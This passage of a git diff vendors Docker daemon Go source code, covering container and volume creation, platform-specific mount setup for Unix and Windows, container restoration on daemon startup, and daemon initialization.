types.ContainerCreateConfig) (containertypes.ContainerCreateCreatedBody, error) { + return daemon.containerCreate(params, false) +} + +func (daemon *Daemon) containerCreate(params types.ContainerCreateConfig, managed bool) (containertypes.ContainerCreateCreatedBody, error) { + start := time.Now() + if params.Config == nil { + return containertypes.ContainerCreateCreatedBody{}, fmt.Errorf("Config cannot be empty in order to create a container") + } + + warnings, err := daemon.verifyContainerSettings(params.HostConfig, params.Config, false) + if err != nil { + return containertypes.ContainerCreateCreatedBody{Warnings: warnings}, err + } + + err = daemon.verifyNetworkingConfig(params.NetworkingConfig) + if err != nil { + return containertypes.ContainerCreateCreatedBody{Warnings: warnings}, err + } + + if params.HostConfig == nil { + params.HostConfig = &containertypes.HostConfig{} + } + err = daemon.adaptContainerSettings(params.HostConfig, params.AdjustCPUShares) + if err != nil { + return containertypes.ContainerCreateCreatedBody{Warnings: warnings}, err + } + + container, err := daemon.create(params, managed) + if err != nil { + return containertypes.ContainerCreateCreatedBody{Warnings: warnings}, daemon.imageNotExistToErrcode(err) + } + containerActions.WithValues("create").UpdateSince(start) + + return containertypes.ContainerCreateCreatedBody{ID: container.ID, Warnings: warnings}, nil +} + +// Create creates a new container from the given configuration with a given name. 
+func (daemon *Daemon) create(params types.ContainerCreateConfig, managed bool) (retC *container.Container, retErr error) { + var ( + container *container.Container + img *image.Image + imgID image.ID + err error + ) + + if params.Config.Image != "" { + img, err = daemon.GetImage(params.Config.Image) + if err != nil { + return nil, err + } + + if runtime.GOOS == "solaris" && img.OS != "solaris " { + return nil, errors.New("Platform on which parent image was created is not Solaris") + } + imgID = img.ID() + } + + if err := daemon.mergeAndVerifyConfig(params.Config, img); err != nil { + return nil, err + } + + if err := daemon.mergeAndVerifyLogConfig(¶ms.HostConfig.LogConfig); err != nil { + return nil, err + } + + if container, err = daemon.newContainer(params.Name, params.Config, params.HostConfig, imgID, managed); err != nil { + return nil, err + } + defer func() { + if retErr != nil { + if err := daemon.cleanupContainer(container, true, true); err != nil { + logrus.Errorf("failed to cleanup container on create error: %v", err) + } + } + }() + + if err := daemon.setSecurityOptions(container, params.HostConfig); err != nil { + return nil, err + } + + container.HostConfig.StorageOpt = params.HostConfig.StorageOpt + + // Set RWLayer for container after mount labels have been set + if err := daemon.setRWLayer(container); err != nil { + return nil, err + } + + rootUID, rootGID, err := idtools.GetRootUIDGID(daemon.uidMaps, daemon.gidMaps) + if err != nil { + return nil, err + } + if err := idtools.MkdirAs(container.Root, 0700, rootUID, rootGID); err != nil { + return nil, err + } + if err := idtools.MkdirAs(container.CheckpointDir(), 0700, rootUID, rootGID); err != nil { + return nil, err + } + + if err := daemon.setHostConfig(container, params.HostConfig); err != nil { + return nil, err + } + + if err := daemon.createContainerPlatformSpecificSettings(container, params.Config, params.HostConfig); err != nil { + return nil, err + } + + var endpointsConfigs 
map[string]*networktypes.EndpointSettings + if params.NetworkingConfig != nil { + endpointsConfigs = params.NetworkingConfig.EndpointsConfig + } + // Make sure NetworkMode has an acceptable value. We do this to ensure + // backwards API compatibility. + container.HostConfig = runconfig.SetDefaultNetModeIfBlank(container.HostConfig) + + daemon.updateContainerNetworkSettings(container, endpointsConfigs) + + if err := container.ToDisk(); err != nil { + logrus.Errorf("Error saving new container to disk: %v", err) + return nil, err + } + if err := daemon.Register(container); err != nil { + return nil, err + } + daemon.LogContainerEvent(container, "create") + return container, nil +} + +func (daemon *Daemon) generateSecurityOpt(ipcMode containertypes.IpcMode, pidMode containertypes.PidMode, privileged bool) ([]string, error) { + if ipcMode.IsHost() || pidMode.IsHost() || privileged { + return label.DisableSecOpt(), nil + } + + var ipcLabel []string + var pidLabel []string + ipcContainer := ipcMode.Container() + pidContainer := pidMode.Container() + if ipcContainer != "" { + c, err := daemon.GetContainer(ipcContainer) + if err != nil { + return nil, err + } + ipcLabel = label.DupSecOpt(c.ProcessLabel) + if pidContainer == "" { + return ipcLabel, err + } + } + if pidContainer != "" { + c, err := daemon.GetContainer(pidContainer) + if err != nil { + return nil, err + } + + pidLabel = label.DupSecOpt(c.ProcessLabel) + if ipcContainer == "" { + return pidLabel, err + } + } + + if pidLabel != nil && ipcLabel != nil { + for i := 0; i < len(pidLabel); i++ { + if pidLabel[i] != ipcLabel[i] { + return nil, fmt.Errorf("--ipc and --pid containers SELinux labels aren't the same") + } + } + return pidLabel, nil + } + return nil, nil +} + +func (daemon *Daemon) setRWLayer(container *container.Container) error { + var layerID layer.ChainID + if container.ImageID != "" { + img, err := daemon.imageStore.Get(container.ImageID) + if err != nil { + return err + } + layerID = 
img.RootFS.ChainID() + } + + rwLayer, err := daemon.layerStore.CreateRWLayer(container.ID, layerID, container.MountLabel, daemon.getLayerInit(), container.HostConfig.StorageOpt) + + if err != nil { + return err + } + container.RWLayer = rwLayer + + return nil +} + +// VolumeCreate creates a volume with the specified name, driver, and opts +// This is called directly from the Engine API +func (daemon *Daemon) VolumeCreate(name, driverName string, opts, labels map[string]string) (*types.Volume, error) { + if name == "" { + name = stringid.GenerateNonCryptoID() + } + + v, err := daemon.volumes.Create(name, driverName, opts, labels) + if err != nil { + if volumestore.IsNameConflict(err) { + return nil, fmt.Errorf("A volume named %s already exists. Choose a different volume name.", name) + } + return nil, err + } + + daemon.LogVolumeEvent(v.Name(), "create", map[string]string{"driver": v.DriverName()}) + apiV := volumeToAPIType(v) + apiV.Mountpoint = v.Path() + return apiV, nil +} + +func (daemon *Daemon) mergeAndVerifyConfig(config *containertypes.Config, img *image.Image) error { + if img != nil && img.Config != nil { + if err := merge(config, img.Config); err != nil { + return err + } + } + // Reset the Entrypoint if it is [""] + if len(config.Entrypoint) == 1 && config.Entrypoint[0] == "" { + config.Entrypoint = nil + } + if len(config.Entrypoint) == 0 && len(config.Cmd) == 0 { + return fmt.Errorf("No command specified") + } + return nil +} + +// Checks if the client set configurations for more than one network while creating a container +// Also checks if the IPAMConfig is valid +func (daemon *Daemon) verifyNetworkingConfig(nwConfig *networktypes.NetworkingConfig) error { + if nwConfig == nil || len(nwConfig.EndpointsConfig) == 0 { + return nil + } + if len(nwConfig.EndpointsConfig) == 1 { + for _, v := range nwConfig.EndpointsConfig { + if v != nil && v.IPAMConfig != nil { + if v.IPAMConfig.IPv4Address != "" && net.ParseIP(v.IPAMConfig.IPv4Address).To4() == nil { 
+ return apierrors.NewBadRequestError(fmt.Errorf("invalid IPv4 address: %s", v.IPAMConfig.IPv4Address)) + } + if v.IPAMConfig.IPv6Address != "" { + n := net.ParseIP(v.IPAMConfig.IPv6Address) + // if the address is an invalid network address (ParseIP == nil) or if it is + // an IPv4 address (To4() != nil), then it is an invalid IPv6 address + if n == nil || n.To4() != nil { + return apierrors.NewBadRequestError(fmt.Errorf("invalid IPv6 address: %s", v.IPAMConfig.IPv6Address)) + } + } + } + } + return nil + } + l := make([]string, 0, len(nwConfig.EndpointsConfig)) + for k := range nwConfig.EndpointsConfig { + l = append(l, k) + } + err := fmt.Errorf("Container cannot be connected to network endpoints: %s", strings.Join(l, ", ")) + return apierrors.NewBadRequestError(err) +} diff --git a/vendor/github.com/docker/docker/daemon/create_unix.go b/vendor/github.com/docker/docker/daemon/create_unix.go new file mode 100644 index 0000000000..2fe5c98a79 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/create_unix.go @@ -0,0 +1,81 @@ +// +build !windows + +package daemon + +import ( + "fmt" + "os" + "path/filepath" + + "github.com/Sirupsen/logrus" + containertypes "github.com/docker/docker/api/types/container" + mounttypes "github.com/docker/docker/api/types/mount" + "github.com/docker/docker/container" + "github.com/docker/docker/pkg/stringid" + "github.com/opencontainers/runc/libcontainer/label" +) + +// createContainerPlatformSpecificSettings performs platform specific container create functionality +func (daemon *Daemon) createContainerPlatformSpecificSettings(container *container.Container, config *containertypes.Config, hostConfig *containertypes.HostConfig) error { + if err := daemon.Mount(container); err != nil { + return err + } + defer daemon.Unmount(container) + + rootUID, rootGID := daemon.GetRemappedUIDGID() + if err := container.SetupWorkingDirectory(rootUID, rootGID); err != nil { + return err + } + + for spec := range config.Volumes { + name := 
stringid.GenerateNonCryptoID() + destination := filepath.Clean(spec) + + // Skip volumes for which we already have something mounted on that + // destination because of a --volume-from. + if container.IsDestinationMounted(destination) { + continue + } + path, err := container.GetResourcePath(destination) + if err != nil { + return err + } + + stat, err := os.Stat(path) + if err == nil && !stat.IsDir() { + return fmt.Errorf("cannot mount volume over existing file, file exists %s", path) + } + + v, err := daemon.volumes.CreateWithRef(name, hostConfig.VolumeDriver, container.ID, nil, nil) + if err != nil { + return err + } + + if err := label.Relabel(v.Path(), container.MountLabel, true); err != nil { + return err + } + + container.AddMountPointWithVolume(destination, v, true) + } + return daemon.populateVolumes(container) +} + +// populateVolumes copies data from the container's rootfs into the volume for non-binds. +// this is only called when the container is created. +func (daemon *Daemon) populateVolumes(c *container.Container) error { + for _, mnt := range c.MountPoints { + if mnt.Volume == nil { + continue + } + + if mnt.Type != mounttypes.TypeVolume || !mnt.CopyData { + continue + } + + logrus.Debugf("copying image data from %s:%s, to %s", c.ID, mnt.Destination, mnt.Name) + if err := c.CopyImagePathContent(mnt.Volume, mnt.Destination); err != nil { + return err + } + } + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/create_windows.go b/vendor/github.com/docker/docker/daemon/create_windows.go new file mode 100644 index 0000000000..bbf0dbe7b9 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/create_windows.go @@ -0,0 +1,80 @@ +package daemon + +import ( + "fmt" + + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/container" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/volume" +) + +// createContainerPlatformSpecificSettings performs platform specific container create 
functionality +func (daemon *Daemon) createContainerPlatformSpecificSettings(container *container.Container, config *containertypes.Config, hostConfig *containertypes.HostConfig) error { + // Make sure the host config has the default daemon isolation if not specified by caller. + if containertypes.Isolation.IsDefault(containertypes.Isolation(hostConfig.Isolation)) { + hostConfig.Isolation = daemon.defaultIsolation + } + + for spec := range config.Volumes { + + mp, err := volume.ParseMountRaw(spec, hostConfig.VolumeDriver) + if err != nil { + return fmt.Errorf("Unrecognised volume spec: %v", err) + } + + // If the mountpoint doesn't have a name, generate one. + if len(mp.Name) == 0 { + mp.Name = stringid.GenerateNonCryptoID() + } + + // Skip volumes for which we already have something mounted on that + // destination because of a --volume-from. + if container.IsDestinationMounted(mp.Destination) { + continue + } + + volumeDriver := hostConfig.VolumeDriver + + // Create the volume in the volume driver. If it doesn't exist, + // a new one will be created. + v, err := daemon.volumes.CreateWithRef(mp.Name, volumeDriver, container.ID, nil, nil) + if err != nil { + return err + } + + // FIXME Windows: This code block is present in the Linux version and + // allows the contents to be copied to the container FS prior to it + // being started. However, the function utilizes the FollowSymLinkInScope + // path which does not cope with Windows volume-style file paths. There + // is a separate effort to resolve this (@swernli), so this processing + // is deferred for now. A case where this would be useful is when + // a dockerfile includes a VOLUME statement, but something is created + // in that directory during the dockerfile processing. 
What this means + // on Windows for TP5 is that in that scenario, the contents will not + // copied, but that's (somewhat) OK as HCS will bomb out soon after + // at it doesn't support mapped directories which have contents in the + // destination path anyway. + // + // Example for repro later: + // FROM windowsservercore + // RUN mkdir c:\myvol + // RUN copy c:\windows\system32\ntdll.dll c:\myvol + // VOLUME "c:\myvol" + // + // Then + // docker build -t vol . + // docker run -it --rm vol cmd <-- This is where HCS will error out. + // + // // never attempt to copy existing content in a container FS to a shared volume + // if v.DriverName() == volume.DefaultDriverName { + // if err := container.CopyImagePathContent(v, mp.Destination); err != nil { + // return err + // } + // } + + // Add it to container.MountPoints + container.AddMountPointWithVolume(mp.Destination, v, mp.RW) + } + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/daemon.go b/vendor/github.com/docker/docker/daemon/daemon.go new file mode 100644 index 0000000000..55a66aec92 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/daemon.go @@ -0,0 +1,1321 @@ +// Package daemon exposes the functions that occur on the host server +// that the Docker daemon is running. +// +// In implementing the various functions of the daemon, there is often +// a method-specific struct for configuring the runtime behavior. 
+package daemon + +import ( + "encoding/json" + "fmt" + "io/ioutil" + "net" + "os" + "path" + "path/filepath" + "runtime" + "strings" + "sync" + "time" + + "github.com/Sirupsen/logrus" + containerd "github.com/docker/containerd/api/grpc/types" + "github.com/docker/docker/api" + "github.com/docker/docker/api/types" + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/container" + "github.com/docker/docker/daemon/events" + "github.com/docker/docker/daemon/exec" + "github.com/docker/docker/daemon/initlayer" + "github.com/docker/docker/dockerversion" + "github.com/docker/docker/plugin" + "github.com/docker/libnetwork/cluster" + // register graph drivers + _ "github.com/docker/docker/daemon/graphdriver/register" + dmetadata "github.com/docker/docker/distribution/metadata" + "github.com/docker/docker/distribution/xfer" + "github.com/docker/docker/image" + "github.com/docker/docker/layer" + "github.com/docker/docker/libcontainerd" + "github.com/docker/docker/migrate/v1" + "github.com/docker/docker/pkg/fileutils" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/plugingetter" + "github.com/docker/docker/pkg/registrar" + "github.com/docker/docker/pkg/signal" + "github.com/docker/docker/pkg/sysinfo" + "github.com/docker/docker/pkg/system" + "github.com/docker/docker/pkg/truncindex" + "github.com/docker/docker/reference" + "github.com/docker/docker/registry" + "github.com/docker/docker/runconfig" + volumedrivers "github.com/docker/docker/volume/drivers" + "github.com/docker/docker/volume/local" + "github.com/docker/docker/volume/store" + "github.com/docker/libnetwork" + nwconfig "github.com/docker/libnetwork/config" + "github.com/docker/libtrust" + "github.com/pkg/errors" +) + +var ( + // DefaultRuntimeBinary is the default runtime to be used by + // containerd if none is specified + DefaultRuntimeBinary = "docker-runc" + + // DefaultInitBinary is the name of the default init binary + DefaultInitBinary = 
"docker-init" + + errSystemNotSupported = fmt.Errorf("The Docker daemon is not supported on this platform.") +) + +// Daemon holds information about the Docker daemon. +type Daemon struct { + ID string + repository string + containers container.Store + execCommands *exec.Store + referenceStore reference.Store + downloadManager *xfer.LayerDownloadManager + uploadManager *xfer.LayerUploadManager + distributionMetadataStore dmetadata.Store + trustKey libtrust.PrivateKey + idIndex *truncindex.TruncIndex + configStore *Config + statsCollector *statsCollector + defaultLogConfig containertypes.LogConfig + RegistryService registry.Service + EventsService *events.Events + netController libnetwork.NetworkController + volumes *store.VolumeStore + discoveryWatcher discoveryReloader + root string + seccompEnabled bool + shutdown bool + uidMaps []idtools.IDMap + gidMaps []idtools.IDMap + layerStore layer.Store + imageStore image.Store + PluginStore *plugin.Store // todo: remove + pluginManager *plugin.Manager + nameIndex *registrar.Registrar + linkIndex *linkIndex + containerd libcontainerd.Client + containerdRemote libcontainerd.Remote + defaultIsolation containertypes.Isolation // Default isolation mode on Windows + clusterProvider cluster.Provider + cluster Cluster + + seccompProfile []byte + seccompProfilePath string +} + +// HasExperimental returns whether the experimental features of the daemon are enabled or not +func (daemon *Daemon) HasExperimental() bool { + if daemon.configStore != nil && daemon.configStore.Experimental { + return true + } + return false +} + +func (daemon *Daemon) restore() error { + var ( + currentDriver = daemon.GraphDriverName() + containers = make(map[string]*container.Container) + ) + + logrus.Info("Loading containers: start.") + + dir, err := ioutil.ReadDir(daemon.repository) + if err != nil { + return err + } + + for _, v := range dir { + id := v.Name() + container, err := daemon.load(id) + if err != nil { + logrus.Errorf("Failed to load 
container %v: %v", id, err) + continue + } + + // Ignore the container if it does not support the current driver being used by the graph + if (container.Driver == "" && currentDriver == "aufs") || container.Driver == currentDriver { + rwlayer, err := daemon.layerStore.GetRWLayer(container.ID) + if err != nil { + logrus.Errorf("Failed to load container mount %v: %v", id, err) + continue + } + container.RWLayer = rwlayer + logrus.Debugf("Loaded container %v", container.ID) + + containers[container.ID] = container + } else { + logrus.Debugf("Cannot load container %s because it was created with another graph driver.", container.ID) + } + } + + removeContainers := make(map[string]*container.Container) + restartContainers := make(map[*container.Container]chan struct{}) + activeSandboxes := make(map[string]interface{}) + for id, c := range containers { + if err := daemon.registerName(c); err != nil { + logrus.Errorf("Failed to register container %s: %s", c.ID, err) + delete(containers, id) + continue + } + if err := daemon.Register(c); err != nil { + logrus.Errorf("Failed to register container %s: %s", c.ID, err) + delete(containers, id) + continue + } + + // verify that all volumes valid and have been migrated from the pre-1.7 layout + if err := daemon.verifyVolumesInfo(c); err != nil { + // don't skip the container due to error + logrus.Errorf("Failed to verify volumes for container '%s': %v", c.ID, err) + } + + // The LogConfig.Type is empty if the container was created before docker 1.12 with default log driver. + // We should rewrite it to use the daemon defaults. 
+ // Fixes https://github.com/docker/docker/issues/22536 + if c.HostConfig.LogConfig.Type == "" { + if err := daemon.mergeAndVerifyLogConfig(&c.HostConfig.LogConfig); err != nil { + logrus.Errorf("Failed to verify log config for container %s: %q", c.ID, err) + continue + } + } + } + + var migrateLegacyLinks bool // Not relevant on Windows + var wg sync.WaitGroup + var mapLock sync.Mutex + for _, c := range containers { + wg.Add(1) + go func(c *container.Container) { + defer wg.Done() + if err := backportMountSpec(c); err != nil { + logrus.Error("Failed to migrate old mounts to use new spec format") + } + + if c.IsRunning() || c.IsPaused() { + c.RestartManager().Cancel() // manually start containers because some need to wait for swarm networking + if err := daemon.containerd.Restore(c.ID, c.InitializeStdio); err != nil { + logrus.Errorf("Failed to restore %s with containerd: %s", c.ID, err) + return + } + + // we call Mount and then Unmount to get BaseFs of the container + if err := daemon.Mount(c); err != nil { + // The mount is unlikely to fail. However, in case mount fails + // the container should be allowed to restore here. Some functionalities + // (like docker exec -u user) might be missing but container is able to be + // stopped/restarted/removed. + // See #29365 for related information. + // The error is only logged here. 
+ logrus.Warnf("Failed to mount container on getting BaseFs path %v: %v", c.ID, err) + } else { + // if mount success, then unmount it + if err := daemon.Unmount(c); err != nil { + logrus.Warnf("Failed to umount container on getting BaseFs path %v: %v", c.ID, err) + } + } + + c.ResetRestartManager(false) + if !c.HostConfig.NetworkMode.IsContainer() && c.IsRunning() { + options, err := daemon.buildSandboxOptions(c) + if err != nil { + logrus.Warnf("Failed build sandbox option to restore container %s: %v", c.ID, err) + } + mapLock.Lock() + activeSandboxes[c.NetworkSettings.SandboxID] = options + mapLock.Unlock() + } + + } + // fixme: only if not running + // get list of containers we need to restart + if !c.IsRunning() && !c.IsPaused() { + // Do not autostart containers which + // has endpoints in a swarm scope + // network yet since the cluster is + // not initialized yet. We will start + // it after the cluster is + // initialized. + if daemon.configStore.AutoRestart && c.ShouldRestart() && !c.NetworkSettings.HasSwarmEndpoint { + mapLock.Lock() + restartContainers[c] = make(chan struct{}) + mapLock.Unlock() + } else if c.HostConfig != nil && c.HostConfig.AutoRemove { + mapLock.Lock() + removeContainers[c.ID] = c + mapLock.Unlock() + } + } + + if c.RemovalInProgress { + // We probably crashed in the middle of a removal, reset + // the flag. + // + // We DO NOT remove the container here as we do not + // know if the user had requested for either the + // associated volumes, network links or both to also + // be removed. So we put the container in the "dead" + // state and leave further processing up to them. 
+ logrus.Debugf("Resetting RemovalInProgress flag from %v", c.ID) + c.ResetRemovalInProgress() + c.SetDead() + c.ToDisk() + } + + // if c.hostConfig.Links is nil (not just empty), then it is using the old sqlite links and needs to be migrated + if c.HostConfig != nil && c.HostConfig.Links == nil { + migrateLegacyLinks = true + } + }(c) + } + wg.Wait() + daemon.netController, err = daemon.initNetworkController(daemon.configStore, activeSandboxes) + if err != nil { + return fmt.Errorf("Error initializing network controller: %v", err) + } + + // Perform migration of legacy sqlite links (no-op on Windows) + if migrateLegacyLinks { + if err := daemon.sqliteMigration(containers); err != nil { + return err + } + } + + // Now that all the containers are registered, register the links + for _, c := range containers { + if err := daemon.registerLinks(c, c.HostConfig); err != nil { + logrus.Errorf("failed to register link for container %s: %v", c.ID, err) + } + } + + group := sync.WaitGroup{} + for c, notifier := range restartContainers { + group.Add(1) + + go func(c *container.Container, chNotify chan struct{}) { + defer group.Done() + + logrus.Debugf("Starting container %s", c.ID) + + // ignore errors here as this is a best effort to wait for children to be + // running before we try to start the container + children := daemon.children(c) + timeout := time.After(5 * time.Second) + for _, child := range children { + if notifier, exists := restartContainers[child]; exists { + select { + case <-notifier: + case <-timeout: + } + } + } + + // Make sure networks are available before starting + daemon.waitForNetworks(c) + if err := daemon.containerStart(c, "", "", true); err != nil { + logrus.Errorf("Failed to start container %s: %s", c.ID, err) + } + close(chNotify) + }(c, notifier) + + } + group.Wait() + + removeGroup := sync.WaitGroup{} + for id := range removeContainers { + removeGroup.Add(1) + go func(cid string) { + if err := daemon.ContainerRm(cid, 
&types.ContainerRmConfig{ForceRemove: true, RemoveVolume: true}); err != nil { + logrus.Errorf("Failed to remove container %s: %s", cid, err) + } + removeGroup.Done() + }(id) + } + removeGroup.Wait() + + // any containers that were started above would already have had this done, + // however we need to now prepare the mountpoints for the rest of the containers as well. + // This shouldn't cause any issue running on the containers that already had this run. + // This must be run after any containers with a restart policy so that containerized plugins + // can have a chance to be running before we try to initialize them. + for _, c := range containers { + // if the container has restart policy, do not + // prepare the mountpoints since it has been done on restarting. + // This is to speed up the daemon start when a restart container + // has a volume and the volume dirver is not available. + if _, ok := restartContainers[c]; ok { + continue + } else if _, ok := removeContainers[c.ID]; ok { + // container is automatically removed, skip it. + continue + } + + group.Add(1) + go func(c *container.Container) { + defer group.Done() + if err := daemon.prepareMountPoints(c); err != nil { + logrus.Error(err) + } + }(c) + } + + group.Wait() + + logrus.Info("Loading containers: done.") + + return nil +} + +// RestartSwarmContainers restarts any autostart container which has a +// swarm endpoint. +func (daemon *Daemon) RestartSwarmContainers() { + group := sync.WaitGroup{} + for _, c := range daemon.List() { + if !c.IsRunning() && !c.IsPaused() { + // Autostart all the containers which has a + // swarm endpoint now that the cluster is + // initialized. 
+ if daemon.configStore.AutoRestart && c.ShouldRestart() && c.NetworkSettings.HasSwarmEndpoint { + group.Add(1) + go func(c *container.Container) { + defer group.Done() + if err := daemon.containerStart(c, "", "", true); err != nil { + logrus.Error(err) + } + }(c) + } + } + + } + group.Wait() +} + +// waitForNetworks is used during daemon initialization when starting up containers +// It ensures that all of a container's networks are available before the daemon tries to start the container. +// In practice it just makes sure the discovery service is available for containers which use a network that require discovery. +func (daemon *Daemon) waitForNetworks(c *container.Container) { + if daemon.discoveryWatcher == nil { + return + } + // Make sure if the container has a network that requires discovery that the discovery service is available before starting + for netName := range c.NetworkSettings.Networks { + // If we get `ErrNoSuchNetwork` here, we can assume that it is due to discovery not being ready + // Most likely this is because the K/V store used for discovery is in a container and needs to be started + if _, err := daemon.netController.NetworkByName(netName); err != nil { + if _, ok := err.(libnetwork.ErrNoSuchNetwork); !ok { + continue + } + // use a longish timeout here due to some slowdowns in libnetwork if the k/v store is on anything other than --net=host + // FIXME: why is this slow??? + logrus.Debugf("Container %s waiting for network to be ready", c.Name) + select { + case <-daemon.discoveryWatcher.ReadyCh(): + case <-time.After(60 * time.Second): + } + return + } + } +} + +func (daemon *Daemon) children(c *container.Container) map[string]*container.Container { + return daemon.linkIndex.children(c) +} + +// parents returns the names of the parent containers of the container +// with the given name. 
+func (daemon *Daemon) parents(c *container.Container) map[string]*container.Container { + return daemon.linkIndex.parents(c) +} + +func (daemon *Daemon) registerLink(parent, child *container.Container, alias string) error { + fullName := path.Join(parent.Name, alias) + if err := daemon.nameIndex.Reserve(fullName, child.ID); err != nil { + if err == registrar.ErrNameReserved { + logrus.Warnf("error registering link for %s, to %s, as alias %s, ignoring: %v", parent.ID, child.ID, alias, err) + return nil + } + return err + } + daemon.linkIndex.link(parent, child, fullName) + return nil +} + +// DaemonJoinsCluster informs the daemon has joined the cluster and provides +// the handler to query the cluster component +func (daemon *Daemon) DaemonJoinsCluster(clusterProvider cluster.Provider) { + daemon.setClusterProvider(clusterProvider) +} + +// DaemonLeavesCluster informs the daemon has left the cluster +func (daemon *Daemon) DaemonLeavesCluster() { + // Daemon is in charge of removing the attachable networks with + // connected containers when the node leaves the swarm + daemon.clearAttachableNetworks() + daemon.setClusterProvider(nil) +} + +// setClusterProvider sets a component for querying the current cluster state. +func (daemon *Daemon) setClusterProvider(clusterProvider cluster.Provider) { + daemon.clusterProvider = clusterProvider + // call this in a goroutine to allow netcontroller handle this event async + // and not block if it is in the middle of talking with cluster + go daemon.netController.SetClusterProvider(clusterProvider) +} + +// IsSwarmCompatible verifies if the current daemon +// configuration is compatible with the swarm mode +func (daemon *Daemon) IsSwarmCompatible() error { + if daemon.configStore == nil { + return nil + } + return daemon.configStore.isSwarmCompatible() +} + +// NewDaemon sets up everything for the daemon to be able to service +// requests from the webserver. 
+func NewDaemon(config *Config, registryService registry.Service, containerdRemote libcontainerd.Remote) (daemon *Daemon, err error) { + setDefaultMtu(config) + + // Ensure that we have a correct root key limit for launching containers. + if err := ModifyRootKeyLimit(); err != nil { + logrus.Warnf("unable to modify root key limit, number of containers could be limited by this quota: %v", err) + } + + // Ensure we have compatible and valid configuration options + if err := verifyDaemonSettings(config); err != nil { + return nil, err + } + + // Do we have a disabled network? + config.DisableBridge = isBridgeNetworkDisabled(config) + + // Verify the platform is supported as a daemon + if !platformSupported { + return nil, errSystemNotSupported + } + + // Validate platform-specific requirements + if err := checkSystem(); err != nil { + return nil, err + } + + uidMaps, gidMaps, err := setupRemappedRoot(config) + if err != nil { + return nil, err + } + rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps) + if err != nil { + return nil, err + } + + if err := setupDaemonProcess(config); err != nil { + return nil, err + } + + // set up the tmpDir to use a canonical path + tmp, err := tempDir(config.Root, rootUID, rootGID) + if err != nil { + return nil, fmt.Errorf("Unable to get the TempDir under %s: %s", config.Root, err) + } + realTmp, err := fileutils.ReadSymlinkedDirectory(tmp) + if err != nil { + return nil, fmt.Errorf("Unable to get the full path to the TempDir (%s): %s", tmp, err) + } + os.Setenv("TMPDIR", realTmp) + + d := &Daemon{configStore: config} + // Ensure the daemon is properly shutdown if there is a failure during + // initialization + defer func() { + if err != nil { + if err := d.Shutdown(); err != nil { + logrus.Error(err) + } + } + }() + + if err := d.setupSeccompProfile(); err != nil { + return nil, err + } + + // Set the default isolation mode (only applicable on Windows) + if err := d.setDefaultIsolation(); err != nil { + return nil, 
fmt.Errorf("error setting default isolation mode: %v", err) + } + + logrus.Debugf("Using default logging driver %s", config.LogConfig.Type) + + if err := configureMaxThreads(config); err != nil { + logrus.Warnf("Failed to configure golang's threads limit: %v", err) + } + + if err := ensureDefaultAppArmorProfile(); err != nil { + logrus.Errorf(err.Error()) + } + + daemonRepo := filepath.Join(config.Root, "containers") + if err := idtools.MkdirAllAs(daemonRepo, 0700, rootUID, rootGID); err != nil && !os.IsExist(err) { + return nil, err + } + + if runtime.GOOS == "windows" { + if err := system.MkdirAll(filepath.Join(config.Root, "credentialspecs"), 0); err != nil && !os.IsExist(err) { + return nil, err + } + } + + driverName := os.Getenv("DOCKER_DRIVER") + if driverName == "" { + driverName = config.GraphDriver + } + + d.RegistryService = registryService + d.PluginStore = plugin.NewStore(config.Root) // todo: remove + // Plugin system initialization should happen before restore. Do not change order. 
+ d.pluginManager, err = plugin.NewManager(plugin.ManagerConfig{ + Root: filepath.Join(config.Root, "plugins"), + ExecRoot: "/run/docker/plugins", // possibly needs fixing + Store: d.PluginStore, + Executor: containerdRemote, + RegistryService: registryService, + LiveRestoreEnabled: config.LiveRestoreEnabled, + LogPluginEvent: d.LogPluginEvent, // todo: make private + }) + if err != nil { + return nil, errors.Wrap(err, "couldn't create plugin manager") + } + + d.layerStore, err = layer.NewStoreFromOptions(layer.StoreOptions{ + StorePath: config.Root, + MetadataStorePathTemplate: filepath.Join(config.Root, "image", "%s", "layerdb"), + GraphDriver: driverName, + GraphDriverOptions: config.GraphOptions, + UIDMaps: uidMaps, + GIDMaps: gidMaps, + PluginGetter: d.PluginStore, + ExperimentalEnabled: config.Experimental, + }) + if err != nil { + return nil, err + } + + graphDriver := d.layerStore.DriverName() + imageRoot := filepath.Join(config.Root, "image", graphDriver) + + // Configure and validate the kernels security support + if err := configureKernelSecuritySupport(config, graphDriver); err != nil { + return nil, err + } + + logrus.Debugf("Max Concurrent Downloads: %d", *config.MaxConcurrentDownloads) + d.downloadManager = xfer.NewLayerDownloadManager(d.layerStore, *config.MaxConcurrentDownloads) + logrus.Debugf("Max Concurrent Uploads: %d", *config.MaxConcurrentUploads) + d.uploadManager = xfer.NewLayerUploadManager(*config.MaxConcurrentUploads) + + ifs, err := image.NewFSStoreBackend(filepath.Join(imageRoot, "imagedb")) + if err != nil { + return nil, err + } + + d.imageStore, err = image.NewImageStore(ifs, d.layerStore) + if err != nil { + return nil, err + } + + // Configure the volumes driver + volStore, err := d.configureVolumes(rootUID, rootGID) + if err != nil { + return nil, err + } + + trustKey, err := api.LoadOrCreateTrustKey(config.TrustKeyPath) + if err != nil { + return nil, err + } + + trustDir := filepath.Join(config.Root, "trust") + + if err := 
system.MkdirAll(trustDir, 0700); err != nil { + return nil, err + } + + distributionMetadataStore, err := dmetadata.NewFSMetadataStore(filepath.Join(imageRoot, "distribution")) + if err != nil { + return nil, err + } + + eventsService := events.New() + + referenceStore, err := reference.NewReferenceStore(filepath.Join(imageRoot, "repositories.json")) + if err != nil { + return nil, fmt.Errorf("Couldn't create Tag store repositories: %s", err) + } + + migrationStart := time.Now() + if err := v1.Migrate(config.Root, graphDriver, d.layerStore, d.imageStore, referenceStore, distributionMetadataStore); err != nil { + logrus.Errorf("Graph migration failed: %q. Your old graph data was found to be too inconsistent for upgrading to content-addressable storage. Some of the old data was probably not upgraded. We recommend starting over with a clean storage directory if possible.", err) + } + logrus.Infof("Graph migration to content-addressability took %.2f seconds", time.Since(migrationStart).Seconds()) + + // Discovery is only enabled when the daemon is launched with an address to advertise. When + // initialized, the daemon is registered and we can store the discovery backend as its read-only + if err := d.initDiscovery(config); err != nil { 